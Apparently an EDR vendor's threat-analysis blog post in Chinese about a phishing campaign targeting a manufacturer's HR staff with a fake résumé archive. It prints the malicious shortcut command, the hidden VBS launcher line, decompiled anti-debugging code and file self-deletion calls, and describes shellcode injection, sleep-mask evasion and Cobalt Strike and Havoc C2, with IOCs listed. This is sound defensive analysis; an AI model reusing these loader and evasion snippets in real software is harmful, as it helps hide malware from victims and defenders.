0


钓鱼特辑(四)安全较量,摆脱“麻瓜”标签

时至今日,尽管员工们对网络安全有所了解,却往往因缺乏足够的安全意识而对攻防没有直观感知。在红队看来,普通员工可能犹如“麻瓜”,防御薄弱,易于突破。

现在红队以求职者或合作方等“人畜无害”的身份在日常沟通中发动钓鱼攻击成为了新常态,一来可信度更高,二来更容易让人放下戒备。于是,HR跟财务人员就成为了红队高频“关照”的对象。

近期,某知名制造业企业HR又收到了来自红队“求职者”的简历,显示名为「陈梓锋-华南理工大学-硕士」的压缩文件,立马被亿格云枢EDR检测到并触发告警,企业安全团队在亿格云安全团队的介入下,及时剖析并处置了本次钓鱼攻击,经分析,本次钓鱼攻击使用了多款远控C2,规避调试器、规避内存扫描等,对抗技术丰富。

攻击者假冒求职者,发送含有木马病毒的压缩包,企图诱使HR解压并打开其中的「陈梓锋-华南理工大学-硕士.PDF」文件。一旦HR不慎操作,远控木马便会迅速感染其计算机并执行渗透。

可以清晰看到,实际上该压缩包里有个隐藏文件:

其中的陈锌锋-华南理工大学-硕士.pdf的文件实际是一个快捷方式,HR如双击此快捷方式便会在本地执行命令:

C:\Windows\System32\cscript.exe ".\__MACOSX\.DOCX\aaa.vbs" && exit

此vbs脚本文件核心代码如下:

newMainPath = currentPath & "\__MACOSX\.DOCX\main.exe"WshShell.Run Chr(34) & newMainPath & Chr(34), 0, False

main.exe来源于里面的隐藏文件夹。

图片

main.exe运行后通过进程PEB结构里的标志和硬件断点寄存器判断本进程是否是调试状态。

_BOOL8 DetectDebugger1(){  return NtCurrentPeb()->BeingDebugged == 1;}_BOOL8 DetectDebugger2(){  HMODULE ModuleHandleW; // rax  HANDLE CurrentThread; // rax  BOOL (__stdcall *GetThreadContext)(HANDLE, LPCONTEXT); // [rsp+20h] [rbp-4F8h]  _CONTEXT Context; // [rsp+30h] [rbp-4E8h] BYREF  Context.P1Home = 0x100010i64;  memset(&Context.P2Home, 0, 0x4C8ui64);  ModuleHandleW = GetModuleHandleW(ModuleName);  GetThreadContext = GetProcAddress(ModuleHandleW, ProcName);  CurrentThread = GetCurrentThread();  if ( !(GetThreadContext)(CurrentThread, &Context) )    return 0i64;  return Context.Dr0 || Context.Dr1 || Context.Dr2 || Context.Dr3;}

随后便会利用NTFS Alternate Data Stream技术强制删除自身文件,安全人员难以取证。

SetFileInformationByHandle(hFile, FileRenameInfo, pRename, sRename);hFile = CreateFileW(szPath, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL,                      OPEN_EXISTING, NULL, NULL);SetFileInformationByHandle(hFile, FileDispositionInfo, &Delete,                                  sizeof(Delete);

之后再利用线程劫持技术注入shellcode到svchost系统进程内。

图片

shellcode使用了类似sleep mask的技术,来规避内存扫描,sleep mask目前可分为两种实现方式:一种是服务端额外下发一段shellcode专门作为加解密;另一种是在本身的shellcode内就实现了加解密。

此样本如下图所示,为第一种情况,由前面一块shellcode定时解密下一块shellcode:

图片

相关解密代码如下图:

图片

解密后,亿格云安全团队定位到此类远控是CobaltStrike(一款商业C2)木马。不仅如此,攻击者同时还使用了另一款开源C2(Havoc),这个C2的代码是直接在main.exe中运行的。

遇到此类木马,无需过分担忧,因为亿格云枢EDR能够有效防范此类攻击,以下为部分真实告警:

图片

图片

图片

图片

图片

图片

亿格云枢EDR结合先进的恶意文件扫描引擎、内存扫描引擎,行为检测引擎,有效应对大部分旨在规避传统安全检测的攻击,构建了一个多维度的检测与响应机制,从而为企业筑起了一道坚固的防线,抵御钓鱼攻击等网络安全威胁,保护企业数据和资产。

IOC 文件与哈希

陈梓锋-华南理工大学-硕士.pdf.lnk

98229c6abb39197ef38b9d273a74bdfcf25cdee61c69b14b4950dc55d821e95a

main.exe

71f409086f2c11bc9736d54810300bd3d5ea8e35f1f8610ca164440deb828de5

IOC 域名

nginx-imfi.fcv3.1197883384467965.cn-hangzhou.fc.devsapp.net

参考

https://github.com/HavocFramework/Havoc

https://xz.aliyun.com/t/13045?time__1311=GqmhBKYIxfxGx0HQ1YD8tGODgjOzddAex

标签: 安全 网络安全

本文转载自: https://blog.csdn.net/Eaglecloud/article/details/141713577
版权归原作者 亿格云安全Lab 所有, 如有侵权,请联系我们删除。

“钓鱼特辑(四)安全较量,摆脱“麻瓜”标签”的评论:

还没有评论